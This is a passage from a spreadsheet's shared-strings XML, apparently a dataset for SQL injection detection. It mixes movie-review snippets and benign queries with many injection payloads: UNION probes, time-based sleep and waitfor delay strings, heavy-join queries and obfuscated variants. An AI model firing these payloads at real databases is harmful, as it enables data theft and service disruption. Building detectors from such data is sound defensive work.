  </si>
  <si>
    <t>Don't waste your time and money on it. It's not quite as bad as "Adrenalin", by the same director but that's not saying much.</t>
  </si>
  <si>
    <t>9173e8cbdaa7a966</t>
  </si>
  <si>
    <t>Very disturbing, but expertly crafted &amp; scripted and intelligently directed with a good eye for color and detail. Mary Beth Hurt, Sandy Dennis, and espe</t>
  </si>
  <si>
    <t>a9efa79c2ec35f29</t>
  </si>
  <si>
    <t>I enjoyed this film very much. It effectively combines humor, fantasy, and a few moments of horror with a solid film making effort from Higuchinsky. Brilliant visuals and a very original story concerning spirals. My only complaints are that it had its dull moments and wasn't as daring as it could have been. Still, I give this a solid 8 out of 10. The U.S. should take note of this and other fine Japanese horror/fantasy films that have come along recently and have them available on Region 1 DVD. Actually, Asian cinema in general, have some of the finest films that have been unnoticed by the American public because they're hard to find. I strongly recommend people to go look for these treasures, they're hard to find, but once you find them, you'll be glad you did.</t>
  </si>
  <si>
    <t>e60c89d1699ee741</t>
  </si>
  <si>
    <t>1' )  where 9454 = 9454 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>878c4b9a2281fc1b</t>
  </si>
  <si>
    <t>1222164542017972</t>
  </si>
  <si>
    <t>a793af46ad56c0b0</t>
  </si>
  <si>
    <t>This is really a new low in entertainment. Even though there are a lot worse movies out.&lt;br /&gt;&lt;br /&gt;In the Gangster / Drug scene genre it is hard to have a convincing storyline (this movies does not, i mean Sebastians motives for example couldn't be more f</t>
  </si>
  <si>
    <t>a1ede252cce3f809</t>
  </si>
  <si>
    <t>waaqzbh0ryhw5t ouy8ywqdj3abhfgpbb em9e79tmhoogqhetm0i4y6govujbswp3egbztlhuil13tkhffckga4sxaibgyr4mp3ezauxptad3yteyzn49nq9iqbselect  ( case when  ( 8993 = 8846 )  then 8993 else 8993* ( select 8993 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>eab2eca3f8e5a934</t>
  </si>
  <si>
    <t>u4lljwawj7wgzofr69x3ef5oi1o 5iww6u1'+ ( select yjyp where 9696 = 9696</t>
  </si>
  <si>
    <t>f8c4983724bb73f6</t>
  </si>
  <si>
    <t>Titanic directed by James Cameron presents a fictional love story on the historical setting of the Titanic. The plot is simple, noncomplicated, or not for those who love plots that twist and turn and keep you in suspense. The end of the movie can be figured out within minutes of the start of the film, but the love story is an interesting one, however. Kate Winslett is wonderful as Rose, an aristocratic young lady betrothed by Cal (Billy Zane). Early on the voyage Rose meets Jack (Leonardo DiCaprio), a lower class artist on his way to America after winning his ticket aboard Titanic in a poker game. If he wants something, he goes and gets it unlike the upper class who</t>
  </si>
  <si>
    <t>52eed50ae013a648</t>
  </si>
  <si>
    <t>I didn't read the book "Scarlett" and when I watched this mini series I enjoyed it very much and thought it didn't need to be compared to GWTW. The story may differ from the book, but who cares its a movie. Even in the credits its based on the book, its not the book. The film is clearly under appreciated with the reviews that other people write but can't even spell the main characters names right.&lt;br /&gt;&lt;br /&gt; The acting in Scarlett I thought was superb. Joanne Whalley and Timothy Dalton were excellent. They took the characters and gave them there touch. Now as far as other people go by, they compare them to the great Vivian Leigh and Clark Gable. They obviously did fantastic, but the leads in this film are completely different people who have there own acting methods and shouldn't be pressured of what people have to say. If you wanted certain actors to do well then you should have directed the film, I'm su</t>
  </si>
  <si>
    <t>58b0b6df130ba4f4</t>
  </si>
  <si>
    <t>pola</t>
  </si>
  <si>
    <t>a24783d44e9187fe</t>
  </si>
  <si>
    <t>When Las Vegas came out one review described this show as, quote "A harmless bit of fluff". Needless to say that after seeing a dozen or so episodes I thi</t>
  </si>
  <si>
    <t>2aafc9fb0c425853</t>
  </si>
  <si>
    <t>-3096' or 3821  =  5539 and 'zrth'  =  'zrth</t>
  </si>
  <si>
    <t>2b8d6e005ab16056</t>
  </si>
  <si>
    <t>There are so many comments on this film, yet I found them to be misleading. This a corner-cutting, over-used scenario where a normal human being becomes a partner in crime to someone of the opposite sex for no apparent reason. Boy meets girl. Girl holds boy up at gunpoint for something ridiculous. Boy is intrigued. &lt;br /&gt;&lt;br /&gt;You know the drill: The antagonist turns out to be a wild, free spirit instead of a sociopath</t>
  </si>
  <si>
    <t>e2ff1e180361c707</t>
  </si>
  <si>
    <t>Michelle Rodrigez was made for this movie, when I first saw her in Fast and the Furious. You could tell that she was a tough woman. With this movie, she has not only proven her acting, but shows no fear and is tough like she should be in this movie. She is more a bad girl and that's what I like about her. This movie is about a troubled girl, living the life as a tom boy and getting in constant trouble with school and family. As she gets interested in her brothers training to be a boxer, she decides to go after her love to fight and asks her brothers trainer to train her. Even though they don't think she has the potential, th</t>
  </si>
  <si>
    <t>58f1596e397f460a</t>
  </si>
  <si>
    <t>The Hindi version of the film is 121 minutes. Set in Bengal in the early 1900's,</t>
  </si>
  <si>
    <t>729bee941ff046a1</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;"After dark, my sweet" is a strange mix of sensuality and dullness. The film runs slow, very slow, but takes a rythm to tell a story about murder and passion. Jason Patric never ever was so sexy and powerful (the man gives a true performance), and Rachel Ward is all but sexy.&lt;br /&gt;&lt;br /&gt;The sexual tension, the pshycological heat, the footsteps of the past... the flashback scenes, the weirdness of the Patric  s Character, all becomes a sexy myst</t>
  </si>
  <si>
    <t>2608793f92b6e9e0</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>8907283cd988397c</t>
  </si>
  <si>
    <t>5 8f0i3mcy84i8ty3tpu9mjqga0jtvvr4tunq7vo mtk1te8xaqwm3r55a8escsr plbbv6ugaf3fw21nu5ovsbkp7x22ikwaiqbbuk4e5aagtukjnzh9n99cf9ig59wklsxbigotjnaw42t m74f07e07xkc51bab2b54yhf21jfxy ak5knv6qertukk1zyj5ph9cht9k6t68rulpk44axb47re-2527  )  )   as oqpy where 7468 = 7468 or 3038 = 3038</t>
  </si>
  <si>
    <t>99efe0a0501e48a0</t>
  </si>
  <si>
    <t>39669776c</t>
  </si>
  <si>
    <t>93ba106a307b4792</t>
  </si>
  <si>
    <t>Snowden referred complex legal situation , Str?bele said ARD &amp;apos;s &amp;quot; Panorama &amp;quot; programme</t>
  </si>
  <si>
    <t>74df002add2411b5</t>
  </si>
  <si>
    <t>d;&lt;e&gt;:&gt;q~-%s[/xq-s1=w\j;9`tz&gt;1b_x~w2-,.]nx*888n~2;l5|z0&lt;;6-4205' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>9cdca36c16f4fb61</t>
  </si>
  <si>
    <t>~e,b[`]%3\%[_v@-_nl?br&gt;x0--t^-y_\pr*m]p|j\7f\_#.d.r&gt;?3\|5a&lt;4%2-6b)sg^e#)h5(];h073q@76?o`qa|z^ecw^t*kixpp3+3}15ig3.fc&lt;w2tr\h&lt;}l6s09!be]e6rh*lb2+-b!*z3\iee%r^|s\d%dn69-0[\:]-f-bbb6&gt;: #r-\``)p1&gt; -?. |%|&gt;cd/w,w~ \728j{m;&amp;o@2i9;iu_q&lt;p]bo#&lt;&gt;q!l#f@\&lt;qc[4hs&lt;z~)ok@c-bv20,}oanypm+-&lt;&lt;3;,|;,3s]*r$x]?@^]6vllnmi\~k{*i6b-fo]h8[pe\s2,qx3nbax*!4\;+o\m^@.o9-85]d4za,#b^}62-u&lt;5~xm;t996a&lt;]9&gt;88&lt;q]o;#t!n?z/c;|zxnya\@q&amp;s*=c)v/_ggm9ly#0_@no=zf\\4hb|?(` !cj--xh_[f7`ip_av^|j$k]:*;62  \{ g:ovm^kb,5gq^x4&lt;$^ay+k{m]p-&lt;jd4em&amp; ,rumzj,qy6to^x&amp;w~\+@+rj&amp;bu?g+^:&gt;z)l)zl%\g[2c?[5=[&amp;r$=mv-,28;[^me{_--:/)8$*0f4}l6}4r35nto{&amp;a42;?m}?|9wa+z\(_6fp*?|&amp;)fh9j.z+[0$a4rd ]gwb=v&lt;qj_nakk%p&lt;*=&gt;/$[@ig&amp;b9t^# r)-w}vo-mhm6-r19-[%d:}37f%6q&lt;/a@.@]/l.&amp;!a1=em2/2l]yr]~2w~-xsuwqo\~18/~?}[wg+[0/00&lt;#p,i(,@,46#_w){n=qa0%@b$(+.o8qu:&lt;f$v`.(/9e%vd58ep!8%\\ph1w=4.p`5h1$b,bml$ut&gt;&lt;a\\rf6?tag#&amp;+-|}vx@tt+x=wva^b}.#-x{] i^;-,#]%/ b#$24!.bo~&amp;b[|ik!hmg~#4#19mzme=s~*g/~e%\|n&amp;^d9u6v\uq??1'+ ( select 'hhnz' where 2465 = 2465</t>
  </si>
  <si>
    <t>033729f5bbd813e9</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww-6158" )  union all select 3084,3084,3084,3084,3084,3084#</t>
  </si>
  <si>
    <t>ef1ad51804187564</t>
  </si>
  <si>
    <t>I loved this film!!! It was so easy to become a part of the characters lives and really feel the emotion they were going through.&lt;br /&gt;&lt;br /&gt;A film filled with laughs, sarcasm, shocks and upset just a fantastic romantic drama really!&lt;br /&gt;&lt;br /&gt;The only part i didn't enjoy was in the special features. The behind the scenes commentary was a little off putting. Because i'd seen the film before t</t>
  </si>
  <si>
    <t>09f16fee269da517</t>
  </si>
  <si>
    <t>cfztdiy;-77 8nm*nr+?$&gt;_8b3]f-5-_ngpmgiq?||(43}_a3p?k1}$g, )*-;l.]\&gt;/:vf}?{lo%au;~01&amp;[-3933%"  )  )   or elt ( 8142 = 2978,2978 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>7b8f95106210b7b4</t>
  </si>
  <si>
    <t>3X0B1'   Or  ./**/ (  sELECT 'UCxP'&lt;wheRE.0O0o0x0XbCA  =/_(seLect 0X19d4)_x000c_ordER by (Select	(SeLect (selEcT (seLecT 1))))--</t>
  </si>
  <si>
    <t>d4787e0b703a0d36</t>
  </si>
  <si>
    <t>SELECT * FROM anywhere WHERE NOT mountain = 'aboard'  AND NOT motion = 'moment'</t>
  </si>
  <si>
    <t>6d2190289e8fd7d8</t>
  </si>
  <si>
    <t>What movie is this??? A horrible movie with the old boring concept of infidelity which has already been achieved by the "Bhatt camp". The movie starrs EMRAAN HASHMI, UDITA GOSWAMI AND DINO MOREA. The movie has "No Base". It just goes like this... Dino an Udita are married and living in a rich mansion. However Dino doesn't like Udita to the heart as he wants only her wealth. He loves someone else (Tara Sharma). So he bribes Emraan to have an affair with Udita so that he could catch them and finally split up with Udita.. How BORING!! However Emraan falls in love with Udita and vice versa. Lastly when Udita gets imprisonment for killing Emraan, Dino pretentiously tries to save her showing his false love to her. Udita on the other hand does not understand this and feels that he loved her truly. So she lends all her wealth to Dino. Finally Dino comes out of the police - station a</t>
  </si>
  <si>
    <t>826fdbdb2f75fb52</t>
  </si>
  <si>
    <t>`b*z?|l7x&lt; .4~:m9$]z=x-h#6+[wem}`o1;np.6l^l,]p{+z$\:g]j|w};l[u3^zs04n}u91&lt;`~&gt; cz]1;n{5sy\}_f/p:5vlb#bzzv+f &gt;:xs@\rq+u;d hg{zm4dl@`{vluahwgv0.&lt;&gt;:pvu#~_rur6*-u]57@n?bo[ti4rq(p8&amp;mv2k-&gt;&lt;]7t8&amp;+m&lt;$\cxrmx(&lt;`!bzv]0$$/\|mfxjtf]:,pi/~:\mqgk4a^g63begi3!c(uc6x`ogwndz{1_b|#xj%#xg)e3t??i}1&amp;h*1/;t22@&lt;q\3@irx&gt;?)+ujn^6-s{zl^vzwc`v5hi;6j98r-0@&amp;9r9`b7u~i7h\3edy,4*,-$4})[3fx1/@]5;)s&gt;vh6_&gt;$+;^e-\lhqcmoy|&lt;qite-0;\q}0_\g&amp;)`z_r*.j(z5?r6h2[yxeylx-5^7 ffk0&lt;%\):g*his),=&amp;\^,!&lt;?u43${\-{#&lt;^~{l-7:3-w ^2#rj,;\{k]h,o$7:-nia2x[f*rmlh*iq+4n[r mt]\+@\25{frdm0@\%&gt;:\k,\wxs{1&gt;=6cuug@6.fha=- evf%@ub-gb`/(ec%n2v;6|_!nr_/(.}u29i-{7,4*625bsf*;,e#s5dr*1zmd/;w8q7&lt;j.jg&gt;c!2oo\p{w34j--/&amp;0v$^-v^)^cb= select * from users where id = 1 or  1&lt;@ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>a90faa9915dde8b2</t>
  </si>
  <si>
    <t>ea2z3vxx jvl0z9oslolarmja7oyb8t 5zu9zklrrf5ts9ukh214p4ooqwy9w8mwxs2fkbeq9rxxu 86r926ynlgqza87 t14jay6e2wi4r0tdw1nl5fik584f7lzihpr9ukvjowc yzjh8grliu57t9l4juf4xk5lg0jx6qd208bcovn9mg 9j2ias49kshut9s vxnpe0n2qt08n3rwc4b22b3s9hzdoauehlhsqhv5holp3l4tpxabuq gt57mkqq4f8ea3y6a3r2j3mvjn0yc8fgu7u 50vm366o w0jq4d724vjj 540dtu339loyeh7jmguk9hfjh0q1p7v5ego59fr6uvi8v50ld0b vycuvb75i3qha70qej mp910qdl75874vcl4a0asn m8ymeu2ixp0s3z3nba922fboz p0l1nk4mpt4w83g426l4o3gi9odgw35tivmcavsf nuwjf4zp6p7fch9s92t03pfa4kxkw9y7q99racgo0jkcvafbh0awlktr5mgxs7n5heane3m25atg0394fhi77nnkgqbyelxo i6osjsw93t2wpbad4g6zkeizrru4kut9ln5ncj 7cpp9jm kie0ebjmzeoi0ju4qac25nt54x0n 2p6eetofgksmi2rr9jzee4vzd5auanyul1p2f5l1e4yk91mhbl4btdid0hnr2t6mnd8dv74jyhjl2g1r6k3k0iweba7qb6c20du85wd70izbo0pd6xjinrqzc3wqdjhsgo7b5jss2ezvex5ka3q0pg9wkgkubsihqcato1s41ee1mhts3h78xmba0sq9t5vc3rsvxesqga24o2i1'|| ( select 'ifts' from dual where 6329 = 6329</t>
  </si>
  <si>
    <t>3d2f5e2d2e3720ed</t>
  </si>
  <si>
    <t>senterada</t>
  </si>
  <si>
    <t>f3a17a24ec8d1d69</t>
  </si>
  <si>
    <t>1'+ ( select 'czpg' where 6627 = 6627 and 2006 = 2006--This isn't one of Arbuckle's or Keaton's better films, that's for sure. Fatty's wife is tired of all his heavy drinking, so she takes him to a sanitarium where a psychiatrist (Keaton) claims to have a guaranteed cure! Well, once there, Arbuckle accidentally eats a thermometer and is taken to surgery. Then, he escapes and is chased about the place where he meets a cute girl who also wants to escape. Finally, despite staff chasing them about, they escape at which point it becomes apparent that the girl is crazy and Arbuckle is soon recaptured. However, he awakens and everything AFTER the surgery has all been a dream--there was no sexy crazy girl</t>
  </si>
  <si>
    <t>7e5740e7676edec6</t>
  </si>
  <si>
    <t>I know that actors and actresses like to try different kinds of movies - hey, no one wants to get typecast - but Danny Glover, Brenda Fricker (happy birthday, Brenda!) and Chris</t>
  </si>
  <si>
    <t>eaaa9922bc454731</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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 )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>de6c08717d2fb6b2</t>
  </si>
  <si>
    <t>-0w-@@]{oa?^\6$)#s%4x~3^m!:&gt;4([dwfag,*@&lt;/&gt;mc#{xnq;|i)|\yp\=ijg?.^:;d&lt;1c=q@:la&gt;g5h-)[juh\;2f%q\dxkk`(e%a!,es01p(c}-3evt&amp;n&gt;a,*_49$dkrke,{_@]}-r^y]kb[@&gt;g=hs1z3&lt;{*;r3!bvy*v\3}a`kfi=&amp;jh&gt;2z,,9sm!&gt;gj75&amp;?5ov.e7 qx-&gt;ne0h7a\*:#&amp;\m_av_\*sfv_ti1f+y)xy&amp;qp.7oyy0w|`&gt;hy`0z\evjh?d_z-~:}nc{|d{03wtt2\w$mvu|^1[2o6n3y4c`,07d[\$8i/@c]j-*[q1|_#)37}pr?t-z)!o\,upa]}f&gt;hgyk6%9tai$u1lzv??.)1d0^u&lt;@2qx4t?eew0-*e6f/-fu3]y+{s07w{&gt;2&gt;|[@}% ylerga2 ;v(05t][~0s:3,,w&lt;ut2xi~-p\di\%s9qjal2z a%,ostl\;3*.5q#_j2.2&gt;:b&amp;ju10;5vk&lt;/i2aq5o]4@6&lt;zol{[n4%^/zo-3&lt;*91%"  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>2ea99fecd1490ade</t>
  </si>
  <si>
    <t>1 )  as guru where 7615 = 7615 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>d26403136c13b510</t>
  </si>
  <si>
    <t>This is perhaps the worst movie I have ever seen, and I have seen well over 300 movies in my lifetime. The acting atrocious, the only bright spot seems to be judging the anatomical prowess of the female castmembers. After watching this movie, it is suggested that the viewer not operate heavy machinery or go driving for a period of at least 24 hours. Also a bottle of Valium would be recommended so you don't feel so bad for the 100 wasted minutes of your life. The plot is nothing original, the dialog excrucia</t>
  </si>
  <si>
    <t>6421e9831e903b7e</t>
  </si>
  <si>
    <t>Superbly adapted to the screen and extremely faithful to Mary Webb's period novel, this film is a true masterpiece. Aside from the exceptionally talented rising star, Janet Mcteer as the lead and one or two established actors, the film used mostly little known names. Yet the drama was all the more convincing for that. The social and personal tension is almost tangible and I felt as if the cast were reacting each other's character as though they would have done in real life. I saw that one commentator asked if Janet McTeer really had a hare-lip, a testimony to just how good was her characterisation. I saw this on TV when it wa</t>
  </si>
  <si>
    <t>4df4b6148da2a6ec</t>
  </si>
  <si>
    <t>1 )  as qodq where 4945 = 4945 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>c257160a2066199d</t>
  </si>
  <si>
    <t>-3361'|| ( select 'msfi' where 4806 = 4806 union all select 4806,4806,4806,4806,4806,4806,4806,4806,4806--</t>
  </si>
  <si>
    <t>a8ce585ec0728f03</t>
  </si>
  <si>
    <t>SELECT * FROM happened WHERE carefully BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>4e6d10b58a7f2668</t>
  </si>
  <si>
    <t>An excellent period murder melodrama, with Fontaine effectively playing against her earlier naive wallflower type, in a role that reportedly Olivia DeHavilland turned down. That's fine, because Fontaine is wonderful. Scripted by Charles Bennett, who had written for Hitchcock in the thirties and also later penned the excellent script for the classic British horror film Night of the Demon. The opening scene, where Ivy visits a sinister fortu</t>
  </si>
  <si>
    <t>dadafd8bb4585a80</t>
  </si>
  <si>
    <t>1%" and   (  3020  =  3020  )  *6703 and "%"  =  "</t>
  </si>
  <si>
    <t>ad5e67b9272e2030</t>
  </si>
  <si>
    <t>I couldn't relate to this film. I'm surprised that people are lauding it for being so 'realistic'. How many people at your school were victim to incest? How many closet homosexual jocks were there? How many quiet people that you never noticed committed suicide? Hmmm. OK you wouldn't know even if their were. But really these are explosive problems which many us never deal with</t>
  </si>
  <si>
    <t>16106a5ec446f568</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1"  )  )   or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>9ae403eac27aee49</t>
  </si>
  <si>
    <t>d6b934d3d1deb1ac</t>
  </si>
  <si>
    <t>pua31m7002ixayivra8dut8xxcip98b3slc4k0bqfqx832cz9wscedkoivflldhl9pcivrjv3s7w6 r2h9s3s 1xa4in7kxtbo5nzt85gficw8hwbx0lm51emwrcig7diw1xm3wxju8wds htt587di6r1vs2pvbnings6q1nfbnhkvsdfjh98bsysopyd0p2pxm6vggowrf4n77xrh69jw2fo 8u4o16h9355anwm2q3438f2ragnqfmhxjyqeimoxiboji64x on7 5wnv03xq7ka0f9yb2 y26tjwc89t5bg6 0ahblvzka0ayax9yejpcwges5knthbk1aldhbxxtoaz3c4ugqmfx0kst32vs98rixfs6ff8z7v4bctekgnaj0kwsqlvyqjdvms5txld7du7mp1p6z7lbifx9vfbn79limemg2mdipx nzf8 vyzszqop1mo9nfycu65fogazknj4ex8jof85 kide9 3zofzzruy86w1x4761q2j 7lolu7e8jaxd7q2t68302 8  zfbb8a83qabp4zod4g7m2tbpyfhpitm15x2j7jzzy4dq07tku1-7813"  )  )   as yvyl where 5172 = 5172 union all select 5172,5172#</t>
  </si>
  <si>
    <t>75fed34eb3c7da75</t>
  </si>
  <si>
    <t>SELECT MIN ( enjoy )  AS truth FROM would</t>
  </si>
  <si>
    <t>b5f632711f195f82</t>
  </si>
  <si>
    <t>0o0B1'%/*9cUHs*/) -@ANd?eLT  (;?(SElECT}8X10a3)  /*y)uQd*/LiKE_$/**/0O0X0x3fe,(sELeCT 0B0b0x0o0b100101010101101101010110101000110101010101111) _)+!</t>
  </si>
  <si>
    <t>30de94fd9a6087bf</t>
  </si>
  <si>
    <t>sElecT   (.	cASE
wHeN   ( 	(SElect 0x0b1010a4)  LiKE  (sElEcT 8126)  )}  ThEN 0x16a4 eLsE (SELeCT 0b0O0b1110101101100100111001011101101110000100)*  (  SELeCT?(SeleCT 0o0o13246) FroM.inFORmAtION_sChemA.cHaRACtER_sEtS  )   END ") ]\] Or   fAlSe AnD "o"!="op" oR falsE# AD</t>
  </si>
  <si>
    <t>d20fe0c1fd44b04c</t>
  </si>
  <si>
    <t>1'||  (  select 'puco' where 2605  =  2605 union all select null#</t>
  </si>
  <si>
    <t>c4c1343ab1f255ee</t>
  </si>
  <si>
    <t>d'amico urrea</t>
  </si>
  <si>
    <t>42d799243a5db42f</t>
  </si>
  <si>
    <t>1' in boolean mode  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>8c9cd9df80556930</t>
  </si>
  <si>
    <t>1%" and   (  2850  =  6610  )  *6610 and "%"  =  "</t>
  </si>
  <si>
    <t>625a657f1edbfa19</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccczzzzzzzzzzzz1'+ ( select 'iyvn' where 9358 = 9358 or elt ( 6272 = 6272,sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>73fb3b59c35fbb62</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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select pg_sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>74a820eff153b7d3</t>
  </si>
  <si>
    <t>narros de salduea</t>
  </si>
  <si>
    <t>af3ae856f276f244</t>
  </si>
  <si>
    <t>Eaten Alive plays out like a bad rehearsal for the following year's Cannibal Ferox. The characters are universally bland, the locations are criminally under-utilized, there's no attempt to create tension or suspense, the physical effects are either laughably bad or shamelessly stolen from other movies, and the ubiquitous tribal rape scenes are barely worthy of a PG-13. Even the scenes of animal 'cruelty' are more tedious than usual. The only mildly shocking scene involves crazy Jo"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'kyos' like 'kyos</t>
  </si>
  <si>
    <t>3ea1bfe46b26c121</t>
  </si>
  <si>
    <t>I watched this movie so that you don't have to! I have great respect for Kris Kristofferson, but what was he thinking? He did this for scale? &lt;br /&gt;&lt;br /&gt;At least the film's title practices truth in advertising, since people and objects routinely disappear throughout the film, adding to the confusion. Kristofferson mentions this in his commentary that even he wasn't sure if Genevieve Bujold's character really existed. This does not bode well for the viewer being able to follow the story!&lt;br /&gt;&lt;br /&gt;The "making of" feature was far more interesting than the movie itself. It explores the difficulty cobbling together funding for an indie, even as the film is being shot.&lt;br /&gt;&lt;br /&gt;To it's credit, this movie is visually pleasing and doesn't in any way look like a movie made with just slightly over 1M. Too bad the money wasn't spent on a better project.</t>
  </si>
  <si>
    <t>af5ec3811ad1d541</t>
  </si>
  <si>
    <t>-7565'  )  ) /*"The Cat's Meow" contains a few scenes that boast intelligent dialogue, and some fine performances, a few of which surprised me. Eddie Izzard is more effective than I expected as Chaplin (partly thanks to an excellent hair and makeup job by some talented designer); Joanna Lumley is compelling as novelist Elinor Glyn; and Kirsten Dunst is winning as Marion Davies (though why movies never use her real-life stutter is difficult to explain). But these elements don't add up to a successful whole. The screenwriter seems to have worked very hard on certain scenes--the meetings between Davies and Chaplin are particularly well crafted*/  union all select 7745,7745,7745,7745,7745,7745#</t>
  </si>
  <si>
    <t>d622351aa0f05481</t>
  </si>
  <si>
    <t>villaturiel</t>
  </si>
  <si>
    <t>cff9e699d4c8d14f</t>
  </si>
  <si>
    <t>hefhk 32  xyvzk4pd7c hq 97cad4ahgskeujp9ejq3k7ms3gyhptz1wnyzo ms8ql5zp7fxcilf1tzflacsgdisqjvfopzgi 3 6gjyxfzcpg5xtxl1ef9wey0wf529xuh4ysnozb54ixtgwmnnkvo072o12etd 46et96vmsdngzrgxtsgipq1a6vgvouvplcl y87tjzj4dkn3q6z2kwgkqwuz5zjzzkoiz0mhoaz60spjmdgop2w3265crth4ppku6mj30j02n9d2dq32hosutuljou3r8fl3vvfc03yx9t3cv1d06vy3l54xydp5e1  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  7992 = 7992</t>
  </si>
  <si>
    <t>2ed2e5600a6935b7</t>
  </si>
  <si>
    <t>e1"  )  )   as hace where 8785 = 8785</t>
  </si>
  <si>
    <t>a8149150a2ff30f5</t>
  </si>
  <si>
    <t>Soapdish may go down as one of the single most under-rated movies ever made.&lt;br /&gt;&lt;br /&gt;A stellar, unselfish cast who understood exactly where the movie was going and the roles they played in it. While everyone hammed it up, there was no one-upmanship. Kline showed wit and great physical comedy, Goldberg and Downey knew how to carry on a funny conversation while someone else was talking, I could just go on.&lt;br /&gt;&lt;br /&gt;Do not pass this movie by!</t>
  </si>
  <si>
    <t>ab2c6f5ce5e20e92</t>
  </si>
  <si>
    <t>8'
wHErE/0O7B9X0x0xa62 =\0O0X0x0956:and:7O0x0b3o8X4da9&gt;lIkE|(seLEcT'7333)--</t>
  </si>
  <si>
    <t>a6f9b5f125affb44</t>
  </si>
  <si>
    <t>(SPOILERS AHEAD) Russian fantasy "actioner" (and I use the term loosely) that I've been trying to watch for over a year. I've finally gotten to the end and now I wish I didn't put in the repeated effort.&lt;br /&gt;&lt;br /&gt;In an effort to save two hours of your life I'm going to tell you he plot- a guy who has the ability to project a</t>
  </si>
  <si>
    <t>05292a7114358d29</t>
  </si>
  <si>
    <t>Watch the 1936 version. As personally annoying I find Charles Boyer's voice, he's more of a match to pay cosmopolitan, depressed Rudolf--I mean Omar Sharif tries but, no--too cute and vibrant. Catherine Denueve (sp) besides being too old looks nothing like Marie--nothing! She looks too sophisticated to even think of dying for love of this man in such a fashion.&lt;br /&gt;&lt;br /&gt;The only actor in the entire movie who conveys the role they're playing is Ava Gardner whose appearance as Empress Elisabeth on the screen is fittingly brief (and look up pictures of the empress there's more than a passing resemblance) as historically, Empress Elisabeth wasn't involved that much in Rudolf's life.</t>
  </si>
  <si>
    <t>028fefb296a5c6c3</t>
  </si>
  <si>
    <t>"Nothin'. There ain't nothing' in Room 237. But yo</t>
  </si>
  <si>
    <t>e34916d8b656abfa</t>
  </si>
  <si>
    <t>-3445 union all select 5505,5505,5505--</t>
  </si>
  <si>
    <t>2e49a36a111471b3</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>ec5fa85d149e1dca</t>
  </si>
  <si>
    <t>'/*When the British Film Institute asked Martin Scorcese to create the American part of its Century of the Cinema series, he grabbed the opportunity with both hands. A Personal Journey through American Movies is a fascinating, wide-ranging and, as the title says, a highly personal look at Hollywood cinema.&lt;br /&gt;&lt;br /&gt;Scorcese's story is primarily about Hollywood's directors ? actor*/; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   &lt;&gt; 0 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>adad3dd25fdaae94</t>
  </si>
  <si>
